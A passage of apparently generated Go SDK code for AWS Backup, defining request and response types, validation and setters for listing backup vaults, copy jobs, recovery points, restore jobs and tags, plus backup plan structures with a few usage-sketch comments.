func (s *ListBackupVaultsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListBackupVaultsInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListBackupVaultsInput) SetMaxResults(v int64) *ListBackupVaultsInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupVaultsInput) SetNextToken(v string) *ListBackupVaultsInput {
s.NextToken = &v
return s
}
type ListBackupVaultsOutput struct {
_ struct{} `type:"structure"`
// An array of backup vault list members containing vault metadata, including
// Amazon Resource Name (ARN), display name, creation date, number of saved
// recovery points, and encryption information if the resources saved in the
// backup vault are encrypted.
BackupVaultList []*VaultListMember `type:"list"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
}
// String returns the string representation
func (s ListBackupVaultsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListBackupVaultsOutput) GoString() string {
return s.String()
}
// SetBackupVaultList sets the BackupVaultList field's value.
func (s *ListBackupVaultsOutput) SetBackupVaultList(v []*VaultListMember) *ListBackupVaultsOutput {
s.BackupVaultList = v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListBackupVaultsOutput) SetNextToken(v string) *ListBackupVaultsOutput {
s.NextToken = &v
return s
}
type ListCopyJobsInput struct {
_ struct{} `type:"structure"`
// The account ID to list the jobs from. Returns only copy jobs associated with
// the specified account ID.
ByAccountId *string `location:"querystring" locationName:"accountId" type:"string"`
// Returns only copy jobs that were created after the specified date.
ByCreatedAfter *time.Time `location:"querystring" locationName:"createdAfter" type:"timestamp"`
// Returns only copy jobs that were created before the specified date.
ByCreatedBefore *time.Time `location:"querystring" locationName:"createdBefore" type:"timestamp"`
// An Amazon Resource Name (ARN) that uniquely identifies a destination backup
// vault to copy to; for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
ByDestinationVaultArn *string `location:"querystring" locationName:"destinationVaultArn" type:"string"`
// Returns only copy jobs that match the specified resource Amazon Resource
// Name (ARN).
ByResourceArn *string `location:"querystring" locationName:"resourceArn" type:"string"`
// Returns only copy jobs for the specified resources:
//
// * DynamoDB for Amazon DynamoDB
//
// * EBS for Amazon Elastic Block Store
//
// * EC2 for Amazon Elastic Compute Cloud
//
// * EFS for Amazon Elastic File System
//
// * RDS for Amazon Relational Database Service
//
// * Aurora for Amazon Aurora
//
// * Storage Gateway for AWS Storage Gateway
ByResourceType *string `location:"querystring" locationName:"resourceType" type:"string"`
// Returns only copy jobs that are in the specified state.
ByState *string `location:"querystring" locationName:"state" type:"string" enum:"CopyJobState"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListCopyJobsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListCopyJobsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListCopyJobsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListCopyJobsInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetByAccountId sets the ByAccountId field's value.
func (s *ListCopyJobsInput) SetByAccountId(v string) *ListCopyJobsInput {
s.ByAccountId = &v
return s
}
// SetByCreatedAfter sets the ByCreatedAfter field's value.
func (s *ListCopyJobsInput) SetByCreatedAfter(v time.Time) *ListCopyJobsInput {
s.ByCreatedAfter = &v
return s
}
// SetByCreatedBefore sets the ByCreatedBefore field's value.
func (s *ListCopyJobsInput) SetByCreatedBefore(v time.Time) *ListCopyJobsInput {
s.ByCreatedBefore = &v
return s
}
// SetByDestinationVaultArn sets the ByDestinationVaultArn field's value.
func (s *ListCopyJobsInput) SetByDestinationVaultArn(v string) *ListCopyJobsInput {
s.ByDestinationVaultArn = &v
return s
}
// SetByResourceArn sets the ByResourceArn field's value.
func (s *ListCopyJobsInput) SetByResourceArn(v string) *ListCopyJobsInput {
s.ByResourceArn = &v
return s
}
// SetByResourceType sets the ByResourceType field's value.
func (s *ListCopyJobsInput) SetByResourceType(v string) *ListCopyJobsInput {
s.ByResourceType = &v
return s
}
// SetByState sets the ByState field's value.
func (s *ListCopyJobsInput) SetByState(v string) *ListCopyJobsInput {
s.ByState = &v
return s
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListCopyJobsInput) SetMaxResults(v int64) *ListCopyJobsInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListCopyJobsInput) SetNextToken(v string) *ListCopyJobsInput {
s.NextToken = &v
return s
}
type ListCopyJobsOutput struct {
_ struct{} `type:"structure"`
// An array of structures containing metadata about your copy jobs returned
// in JSON format.
CopyJobs []*CopyJob `type:"list"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
}
// String returns the string representation
func (s ListCopyJobsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListCopyJobsOutput) GoString() string {
return s.String()
}
// SetCopyJobs sets the CopyJobs field's value.
func (s *ListCopyJobsOutput) SetCopyJobs(v []*CopyJob) *ListCopyJobsOutput {
s.CopyJobs = v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListCopyJobsOutput) SetNextToken(v string) *ListCopyJobsOutput {
s.NextToken = &v
return s
}
type ListProtectedResourcesInput struct {
_ struct{} `type:"structure"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListProtectedResourcesInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListProtectedResourcesInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListProtectedResourcesInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListProtectedResourcesInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListProtectedResourcesInput) SetMaxResults(v int64) *ListProtectedResourcesInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListProtectedResourcesInput) SetNextToken(v string) *ListProtectedResourcesInput {
s.NextToken = &v
return s
}
type ListProtectedResourcesOutput struct {
_ struct{} `type:"structure"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
// An array of resources successfully backed up by AWS Backup including the
// time the resource was saved, an Amazon Resource Name (ARN) of the resource,
// and a resource type.
Results []*ProtectedResource `type:"list"`
}
// String returns the string representation
func (s ListProtectedResourcesOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListProtectedResourcesOutput) GoString() string {
return s.String()
}
// SetNextToken sets the NextToken field's value.
func (s *ListProtectedResourcesOutput) SetNextToken(v string) *ListProtectedResourcesOutput {
s.NextToken = &v
return s
}
// SetResults sets the Results field's value.
func (s *ListProtectedResourcesOutput) SetResults(v []*ProtectedResource) *ListProtectedResourcesOutput {
s.Results = v
return s
}
type ListRecoveryPointsByBackupVaultInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// Returns only recovery points that match the specified backup plan ID.
ByBackupPlanId *string `location:"querystring" locationName:"backupPlanId" type:"string"`
// Returns only recovery points that were created after the specified timestamp.
ByCreatedAfter *time.Time `location:"querystring" locationName:"createdAfter" type:"timestamp"`
// Returns only recovery points that were created before the specified timestamp.
ByCreatedBefore *time.Time `location:"querystring" locationName:"createdBefore" type:"timestamp"`
// Returns only recovery points that match the specified resource Amazon Resource
// Name (ARN).
ByResourceArn *string `location:"querystring" locationName:"resourceArn" type:"string"`
// Returns only recovery points that match the specified resource type.
ByResourceType *string `location:"querystring" locationName:"resourceType" type:"string"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListRecoveryPointsByBackupVaultInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListRecoveryPointsByBackupVaultInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListRecoveryPointsByBackupVaultInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListRecoveryPointsByBackupVaultInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetBackupVaultName(v string) *ListRecoveryPointsByBackupVaultInput {
s.BackupVaultName = &v
return s
}
// SetByBackupPlanId sets the ByBackupPlanId field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetByBackupPlanId(v string) *ListRecoveryPointsByBackupVaultInput {
s.ByBackupPlanId = &v
return s
}
// SetByCreatedAfter sets the ByCreatedAfter field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetByCreatedAfter(v time.Time) *ListRecoveryPointsByBackupVaultInput {
s.ByCreatedAfter = &v
return s
}
// SetByCreatedBefore sets the ByCreatedBefore field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetByCreatedBefore(v time.Time) *ListRecoveryPointsByBackupVaultInput {
s.ByCreatedBefore = &v
return s
}
// SetByResourceArn sets the ByResourceArn field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetByResourceArn(v string) *ListRecoveryPointsByBackupVaultInput {
s.ByResourceArn = &v
return s
}
// SetByResourceType sets the ByResourceType field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetByResourceType(v string) *ListRecoveryPointsByBackupVaultInput {
s.ByResourceType = &v
return s
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetMaxResults(v int64) *ListRecoveryPointsByBackupVaultInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListRecoveryPointsByBackupVaultInput) SetNextToken(v string) *ListRecoveryPointsByBackupVaultInput {
s.NextToken = &v
return s
}
type ListRecoveryPointsByBackupVaultOutput struct {
_ struct{} `type:"structure"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
// An array of objects that contain detailed information about recovery points
// saved in a backup vault.
RecoveryPoints []*RecoveryPointByBackupVault `type:"list"`
}
// String returns the string representation
func (s ListRecoveryPointsByBackupVaultOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListRecoveryPointsByBackupVaultOutput) GoString() string {
return s.String()
}
// SetNextToken sets the NextToken field's value.
func (s *ListRecoveryPointsByBackupVaultOutput) SetNextToken(v string) *ListRecoveryPointsByBackupVaultOutput {
s.NextToken = &v
return s
}
// SetRecoveryPoints sets the RecoveryPoints field's value.
func (s *ListRecoveryPointsByBackupVaultOutput) SetRecoveryPoints(v []*RecoveryPointByBackupVault) *ListRecoveryPointsByBackupVaultOutput {
s.RecoveryPoints = v
return s
}
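// A usage sketch (not generated code) combining the required vault name with
// the optional resource-type and time filters via the generated Pages helper;
// the vault name and filter values are hypothetical.
//
//	in := (&backup.ListRecoveryPointsByBackupVaultInput{}).
//		SetBackupVaultName("Default").
//		SetByResourceType("EBS").
//		SetByCreatedAfter(time.Now().AddDate(0, -1, 0)) // created in the last month
//	err := svc.ListRecoveryPointsByBackupVaultPages(in,
//		func(page *backup.ListRecoveryPointsByBackupVaultOutput, lastPage bool) bool {
//			for _, rp := range page.RecoveryPoints {
//				fmt.Println(aws.StringValue(rp.RecoveryPointArn))
//			}
//			return true // keep paging
//		})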
type ListRecoveryPointsByResourceInput struct {
_ struct{} `type:"structure"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
// An ARN that uniquely identifies a resource. The format of the ARN depends
// on the resource type.
//
// ResourceArn is a required field
ResourceArn *string `location:"uri" locationName:"resourceArn" type:"string" required:"true"`
}
// String returns the string representation
func (s ListRecoveryPointsByResourceInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListRecoveryPointsByResourceInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListRecoveryPointsByResourceInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListRecoveryPointsByResourceInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if s.ResourceArn == nil {
invalidParams.Add(request.NewErrParamRequired("ResourceArn"))
}
if s.ResourceArn != nil && len(*s.ResourceArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("ResourceArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListRecoveryPointsByResourceInput) SetMaxResults(v int64) *ListRecoveryPointsByResourceInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListRecoveryPointsByResourceInput) SetNextToken(v string) *ListRecoveryPointsByResourceInput {
s.NextToken = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *ListRecoveryPointsByResourceInput) SetResourceArn(v string) *ListRecoveryPointsByResourceInput {
s.ResourceArn = &v
return s
}
type ListRecoveryPointsByResourceOutput struct {
_ struct{} `type:"structure"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
// An array of objects that contain detailed information about recovery points
// of the specified resource type.
RecoveryPoints []*RecoveryPointByResource `type:"list"`
}
// String returns the string representation
func (s ListRecoveryPointsByResourceOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListRecoveryPointsByResourceOutput) GoString() string {
return s.String()
}
// SetNextToken sets the NextToken field's value.
func (s *ListRecoveryPointsByResourceOutput) SetNextToken(v string) *ListRecoveryPointsByResourceOutput {
s.NextToken = &v
return s
}
// SetRecoveryPoints sets the RecoveryPoints field's value.
func (s *ListRecoveryPointsByResourceOutput) SetRecoveryPoints(v []*RecoveryPointByResource) *ListRecoveryPointsByResourceOutput {
s.RecoveryPoints = v
return s
}
type ListRestoreJobsInput struct {
_ struct{} `type:"structure"`
// The account ID to list the jobs from. Returns only restore jobs associated
// with the specified account ID.
ByAccountId *string `location:"querystring" locationName:"accountId" type:"string"`
// Returns only restore jobs that were created after the specified date.
ByCreatedAfter *time.Time `location:"querystring" locationName:"createdAfter" type:"timestamp"`
// Returns only restore jobs that were created before the specified date.
ByCreatedBefore *time.Time `location:"querystring" locationName:"createdBefore" type:"timestamp"`
// Returns only restore jobs associated with the specified job status.
ByStatus *string `location:"querystring" locationName:"status" type:"string" enum:"RestoreJobStatus"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
}
// String returns the string representation
func (s ListRestoreJobsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListRestoreJobsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListRestoreJobsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListRestoreJobsInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetByAccountId sets the ByAccountId field's value.
func (s *ListRestoreJobsInput) SetByAccountId(v string) *ListRestoreJobsInput {
s.ByAccountId = &v
return s
}
// SetByCreatedAfter sets the ByCreatedAfter field's value.
func (s *ListRestoreJobsInput) SetByCreatedAfter(v time.Time) *ListRestoreJobsInput {
s.ByCreatedAfter = &v
return s
}
// SetByCreatedBefore sets the ByCreatedBefore field's value.
func (s *ListRestoreJobsInput) SetByCreatedBefore(v time.Time) *ListRestoreJobsInput {
s.ByCreatedBefore = &v
return s
}
// SetByStatus sets the ByStatus field's value.
func (s *ListRestoreJobsInput) SetByStatus(v string) *ListRestoreJobsInput {
s.ByStatus = &v
return s
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListRestoreJobsInput) SetMaxResults(v int64) *ListRestoreJobsInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListRestoreJobsInput) SetNextToken(v string) *ListRestoreJobsInput {
s.NextToken = &v
return s
}
type ListRestoreJobsOutput struct {
_ struct{} `type:"structure"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
// An array of objects that contain detailed information about jobs to restore
// saved resources.
RestoreJobs []*RestoreJobsListMember `type:"list"`
}
// String returns the string representation
func (s ListRestoreJobsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListRestoreJobsOutput) GoString() string {
return s.String()
}
// SetNextToken sets the NextToken field's value.
func (s *ListRestoreJobsOutput) SetNextToken(v string) *ListRestoreJobsOutput {
s.NextToken = &v
return s
}
// SetRestoreJobs sets the RestoreJobs field's value.
func (s *ListRestoreJobsOutput) SetRestoreJobs(v []*RestoreJobsListMember) *ListRestoreJobsOutput {
s.RestoreJobs = v
return s
}
type ListTagsInput struct {
_ struct{} `type:"structure"`
// The maximum number of items to be returned.
MaxResults *int64 `location:"querystring" locationName:"maxResults" min:"1" type:"integer"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `location:"querystring" locationName:"nextToken" type:"string"`
// An Amazon Resource Name (ARN) that uniquely identifies a resource. The format
// of the ARN depends on the type of resource. Valid targets for ListTags are
// recovery points, backup plans, and backup vaults.
//
// ResourceArn is a required field
ResourceArn *string `location:"uri" locationName:"resourceArn" type:"string" required:"true"`
}
// String returns the string representation
func (s ListTagsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListTagsInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *ListTagsInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "ListTagsInput"}
if s.MaxResults != nil && *s.MaxResults < 1 {
invalidParams.Add(request.NewErrParamMinValue("MaxResults", 1))
}
if s.ResourceArn == nil {
invalidParams.Add(request.NewErrParamRequired("ResourceArn"))
}
if s.ResourceArn != nil && len(*s.ResourceArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("ResourceArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetMaxResults sets the MaxResults field's value.
func (s *ListTagsInput) SetMaxResults(v int64) *ListTagsInput {
s.MaxResults = &v
return s
}
// SetNextToken sets the NextToken field's value.
func (s *ListTagsInput) SetNextToken(v string) *ListTagsInput {
s.NextToken = &v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *ListTagsInput) SetResourceArn(v string) *ListTagsInput {
s.ResourceArn = &v
return s
}
type ListTagsOutput struct {
_ struct{} `type:"structure"`
// The next item following a partial list of returned items. For example, if
// a request is made to return maxResults number of items, NextToken allows
// you to return more items in your list starting at the location pointed to
// by the next token.
NextToken *string `type:"string"`
// To help organize your resources, you can assign your own metadata to the
// resources you create. Each tag is a key-value pair.
Tags map[string]*string `type:"map" sensitive:"true"`
}
// String returns the string representation
func (s ListTagsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ListTagsOutput) GoString() string {
return s.String()
}
// SetNextToken sets the NextToken field's value.
func (s *ListTagsOutput) SetNextToken(v string) *ListTagsOutput {
s.NextToken = &v
return s
}
// SetTags sets the Tags field's value.
func (s *ListTagsOutput) SetTags(v map[string]*string) *ListTagsOutput {
s.Tags = v
return s
}
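// A short usage sketch (not generated code); the resource ARN is a
// hypothetical placeholder and follows the vault ARN format shown above.
//
//	out, err := svc.ListTags((&backup.ListTagsInput{}).
//		SetResourceArn("arn:aws:backup:us-east-1:123456789012:vault:aBackupVault"))
//	if err == nil {
//		for k, v := range out.Tags {
//			fmt.Printf("%s=%s\n", k, aws.StringValue(v))
//		}
//	}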
// Indicates that a required parameter is missing.
type MissingParameterValueException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s MissingParameterValueException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s MissingParameterValueException) GoString() string {
return s.String()
}
func newErrorMissingParameterValueException(v protocol.ResponseMetadata) error {
return &MissingParameterValueException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *MissingParameterValueException) Code() string {
return "MissingParameterValueException"
}
// Message returns the exception's message.
func (s *MissingParameterValueException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *MissingParameterValueException) OrigErr() error {
return nil
}
func (s *MissingParameterValueException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// StatusCode returns the HTTP status code for the request's response error.
func (s *MissingParameterValueException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *MissingParameterValueException) RequestID() string {
return s.RespMetadata.RequestID
}
// Contains an optional backup plan display name and an array of BackupRule
// objects, each of which specifies a backup rule. Each rule in a backup plan
// is a separate scheduled task and can back up a different selection of AWS
// resources.
type Plan struct {
_ struct{} `type:"structure"`
// Contains a list of BackupOptions for each resource type.
AdvancedBackupSettings []*AdvancedBackupSetting `type:"list"`
// The display name of a backup plan.
//
// BackupPlanName is a required field
BackupPlanName *string `type:"string" required:"true"`
// An array of BackupRule objects, each of which specifies a scheduled task
// that is used to back up a selection of resources.
//
// Rules is a required field
Rules []*Rule `type:"list" required:"true"`
}
// String returns the string representation
func (s Plan) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s Plan) GoString() string {
return s.String()
}
// SetAdvancedBackupSettings sets the AdvancedBackupSettings field's value.
func (s *Plan) SetAdvancedBackupSettings(v []*AdvancedBackupSetting) *Plan {
s.AdvancedBackupSettings = v
return s
}
// SetBackupPlanName sets the BackupPlanName field's value.
func (s *Plan) SetBackupPlanName(v string) *Plan {
s.BackupPlanName = &v
return s
}
// SetRules sets the Rules field's value.
func (s *Plan) SetRules(v []*Rule) *Plan {
s.Rules = v
return s
}
// Contains an optional backup plan display name and an array of BackupRule
// objects, each of which specifies a backup rule. Each rule in a backup plan
// is a separate scheduled task and can back up a different selection of AWS
// resources.
type PlanInput struct {
_ struct{} `type:"structure"`
// Specifies a list of BackupOptions for each resource type. These settings
// are only available for Windows VSS backup jobs.
AdvancedBackupSettings []*AdvancedBackupSetting `type:"list"`
// The display name of a backup plan.
//
// BackupPlanName is a required field
BackupPlanName *string `type:"string" required:"true"`
// An array of BackupRule objects, each of which specifies a scheduled task
// that is used to back up a selection of resources.
//
// Rules is a required field
Rules []*RuleInput `type:"list" required:"true"`
}
// String returns the string representation
func (s PlanInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s PlanInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *PlanInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "PlanInput"}
if s.BackupPlanName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanName"))
}
if s.Rules == nil {
invalidParams.Add(request.NewErrParamRequired("Rules"))
}
if s.Rules != nil {
for i, v := range s.Rules {
if v == nil {
continue
}
if err := v.Validate(); err != nil {
invalidParams.AddNested(fmt.Sprintf("%s[%v]", "Rules", i), err.(request.ErrInvalidParams))
}
}
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetAdvancedBackupSettings sets the AdvancedBackupSettings field's value.
func (s *PlanInput) SetAdvancedBackupSettings(v []*AdvancedBackupSetting) *PlanInput {
s.AdvancedBackupSettings = v
return s
}
// SetBackupPlanName sets the BackupPlanName field's value.
func (s *PlanInput) SetBackupPlanName(v string) *PlanInput {
s.BackupPlanName = &v
return s
}
// SetRules sets the Rules field's value.
func (s *PlanInput) SetRules(v []*RuleInput) *PlanInput {
s.Rules = v
return s
}
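// A sketch (not generated code) of assembling a PlanInput, validating it
// client-side, and passing it to CreateBackupPlan; the plan name, rule name,
// vault name, and schedule are hypothetical.
//
//	rule := (&backup.RuleInput{}).
//		SetRuleName("DailyBackups").
//		SetTargetBackupVaultName("Default").
//		SetScheduleExpression("cron(0 5 ? * * *)") // 05:00 UTC daily
//	plan := (&backup.PlanInput{}).
//		SetBackupPlanName("MyBackupPlan").
//		SetRules([]*backup.RuleInput{rule})
//	if err := plan.Validate(); err != nil {
//		return err // catches missing required fields before the API call
//	}
//	_, err := svc.CreateBackupPlan((&backup.CreateBackupPlanInput{}).SetBackupPlan(plan))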
// An object specifying metadata associated with a backup plan template.
type PlanTemplatesListMember struct {
_ struct{} `type:"structure"`
// Uniquely identifies a stored backup plan template.
BackupPlanTemplateId *string `type:"string"`
// The optional display name of a backup plan template.
BackupPlanTemplateName *string `type:"string"`
}
// String returns the string representation
func (s PlanTemplatesListMember) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s PlanTemplatesListMember) GoString() string {
return s.String()
}
// SetBackupPlanTemplateId sets the BackupPlanTemplateId field's value.
func (s *PlanTemplatesListMember) SetBackupPlanTemplateId(v string) *PlanTemplatesListMember {
s.BackupPlanTemplateId = &v
return s
}
// SetBackupPlanTemplateName sets the BackupPlanTemplateName field's value.
func (s *PlanTemplatesListMember) SetBackupPlanTemplateName(v string) *PlanTemplatesListMember {
s.BackupPlanTemplateName = &v
return s
}
// Contains metadata about a backup plan.
type PlansListMember struct {
_ struct{} `type:"structure"`
// Contains a list of BackupOptions for a resource type.
AdvancedBackupSettings []*AdvancedBackupSetting `type:"list"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup plan; for
// example, arn:aws:backup:us-east-1:123456789012:plan:8F81F553-3A74-4A3F-B93D-B3360DC80C50.
BackupPlanArn *string `type:"string"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// The display name of a saved backup plan.
BackupPlanName *string `type:"string"`
// The date and time a resource backup plan is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
// The date and time a backup plan is deleted, in Unix format and Coordinated
// Universal Time (UTC). The value of DeletionDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
DeletionDate *time.Time `type:"timestamp"`
// The last time a job to back up resources was run with this backup plan. A date and
// time, in Unix format and Coordinated Universal Time (UTC). The value of LastExecutionDate
// is accurate to milliseconds. For example, the value 1516925490.087 represents
// Friday, January 26, 2018 12:11:30.087 AM.
LastExecutionDate *time.Time `type:"timestamp"`
// Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most
// 1,024 bytes long. Version IDs cannot be edited.
VersionId *string `type:"string"`
}
// String returns the string representation
func (s PlansListMember) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s PlansListMember) GoString() string {
return s.String()
}
// SetAdvancedBackupSettings sets the AdvancedBackupSettings field's value.
func (s *PlansListMember) SetAdvancedBackupSettings(v []*AdvancedBackupSetting) *PlansListMember {
s.AdvancedBackupSettings = v
return s
}
